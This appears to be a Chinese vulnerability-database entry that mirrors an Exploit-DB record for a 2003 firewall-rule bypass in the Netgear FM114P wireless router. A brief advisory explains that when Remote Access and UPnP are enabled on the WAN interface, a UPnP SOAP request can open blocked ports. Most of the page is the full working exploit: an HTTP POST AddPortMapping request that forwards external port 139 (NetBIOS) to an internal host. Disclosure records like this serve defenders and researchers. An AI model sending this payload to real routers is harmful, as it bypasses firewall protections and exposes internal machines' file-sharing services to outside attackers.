NETGEAR FM114P ProSafe Wireless Router - Rule Bypass

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1053807 漏洞类型
发布时间 2003-04-03 更新时间 2003-04-03
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Hardware CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/22455
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/7270/info

The Netgear FM114P allows certain ports to be blocked, both for external users attempting to enter the local network and for local users connecting to the WAN. If Remote Access and Universal Plug and Play are both enabled on the WAN interface, a UPnP SOAP request can cause a connection to be intitiated through a port that is normally blocked. 

POST /upnp/service/WANPPPConnection HTTP/1.1
Content-Type: text/xml; charset="utf-8"
SOAPAction: "urn:schemas-upnp-org:service:WANPPPConnection:1#AddPortMapping"
User-Agent: Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)
Host: 192.168.0.1
Content-Length: 1123
Connection: Keep-Alive
Pragma: no-cache

<?xml version="1.0"?>
<SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANPPPConnection:1">
<NewRemoteHost xmlns:dt="urn:schemas-microsoft-com:datatypes"
dt:dt="string"></NewRemoteHost>
<NewExternalPort xmlns:dt="urn:schemas-microsoft-com:datatypes"
dt:dt="ui2">139</NewExternalPort>
<NewProtocol xmlns:dt="urn:schemas-microsoft-com:datatypes"
dt:dt="string">TCP</NewProtocol>
<NewInternalPort xmlns:dt="urn:schemas-microsoft-com:datatypes"
dt:dt="ui2">139</NewInternalPort>
<NewInternalClient xmlns:dt="urn:schemas-microsoft-com:datatypes"
dt:dt="string">192.168.0.6</NewInternalClient>
<NewEnabled xmlns:dt="urn:schemas-microsoft-com:datatypes"
dt:dt="boolean">1</NewEnabled>
<NewPortMappingDescription xmlns:dt="urn:schemas-microsoft-com:datatypes"
dt:dt="string">NetBios</NewPortMappingDescription>
<NewLeaseDuration xmlns:dt="urn:schemas-microsoft-com:datatypes"
dt:dt="ui4">0</NewLeaseDuration>
</m:AddPortMapping>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>